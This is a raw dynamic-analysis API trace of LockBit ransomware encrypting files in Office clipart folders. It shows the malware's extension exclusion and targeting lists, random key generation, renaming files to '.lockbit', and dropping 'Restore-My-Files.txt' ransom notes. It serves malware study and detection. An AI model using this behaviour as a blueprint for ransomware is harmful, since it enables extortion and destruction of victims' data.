[0168.138] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.138] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.139] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.139] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.139] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.139] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.139] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.139] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP.lockbit") returned 72 [0168.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01236u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0168.140] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.140] malloc (_Size=0x40068) returned 0x3d70450 [0168.140] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31968) returned 1 [0168.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0168.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0168.141] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0168.144] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.144] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.144] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.145] free (_Block=0x1fa2ed8) [0168.145] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.146] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.146] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.146] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1764, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01239K.JPG", cAlternateFileName="")) returned 1 [0168.146] lstrcmpiW (lpString1=".", lpString2="PH01239K.JPG") returned -1 [0168.146] lstrcmpiW (lpString1="..", lpString2="PH01239K.JPG") returned -1 [0168.146] PathFindExtensionW (pszPath="PH01239K.JPG") returned=".JPG" [0168.146] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.146] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.146] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.146] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.146] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.146] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.146] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.147] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.147] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01239K.JPG") returned 1 [0168.148] lstrcmpiW (lpString1="ntldr", lpString2="PH01239K.JPG") returned -1 [0168.148] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01239K.JPG") returned -1 [0168.148] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01239K.JPG") returned -1 [0168.148] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01239K.JPG") returned -1 [0168.148] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01239K.JPG") returned 1 [0168.148] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01239K.JPG") returned -1 [0168.148] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.148] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG") returned=".JPG" [0168.148] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.148] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.148] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0168.149] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0168.149] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0168.149] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG.lockbit") returned 72 [0168.150] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01239k.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0168.153] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.154] malloc (_Size=0x40068) returned 0x3f70048 [0168.154] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=5988) returned 1 [0168.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0168.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0168.155] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0168.157] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.157] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.157] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.158] free (_Block=0x1fa2ed8) [0168.158] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01239K.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.158] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.158] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeb51600, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbeb51600, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01247U.BMP", cAlternateFileName="")) returned 1 [0168.159] lstrcmpiW (lpString1=".", lpString2="PH01247U.BMP") returned -1 [0168.159] lstrcmpiW (lpString1="..", lpString2="PH01247U.BMP") returned -1 [0168.159] PathFindExtensionW (pszPath="PH01247U.BMP") returned=".BMP" [0168.159] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.159] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.159] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.159] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.159] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.159] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.160] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.160] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01247U.BMP") returned 1 [0168.160] lstrcmpiW (lpString1="ntldr", lpString2="PH01247U.BMP") returned -1 [0168.160] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01247U.BMP") returned -1 [0168.160] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01247U.BMP") returned -1 [0168.160] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01247U.BMP") returned -1 [0168.160] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01247U.BMP") returned 1 [0168.160] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01247U.BMP") returned -1 [0168.160] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.160] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP") returned=".BMP" [0168.160] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.161] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.161] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.161] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP.lockbit") returned 72 [0168.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01247u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.162] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.162] malloc (_Size=0x40068) returned 0x3e70008 [0168.162] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=31752) returned 1 [0168.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0168.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0168.163] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0168.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.167] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.168] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.168] free (_Block=0x1fa2ed8) [0168.168] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.169] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.169] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.169] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72230800, ftCreationTime.dwHighDateTime=0x1bd4e5f, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x72230800, ftLastWriteTime.dwHighDateTime=0x1bd4e5f, nFileSizeHigh=0x0, nFileSizeLow=0x1e55, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01255G.GIF", cAlternateFileName="")) returned 1 [0168.169] lstrcmpiW (lpString1=".", lpString2="PH01255G.GIF") returned -1 [0168.169] lstrcmpiW (lpString1="..", lpString2="PH01255G.GIF") returned -1 [0168.169] PathFindExtensionW (pszPath="PH01255G.GIF") returned=".GIF" [0168.169] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0168.169] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0168.169] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0168.169] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0168.169] lstrcmpiW (lpString1=".com", 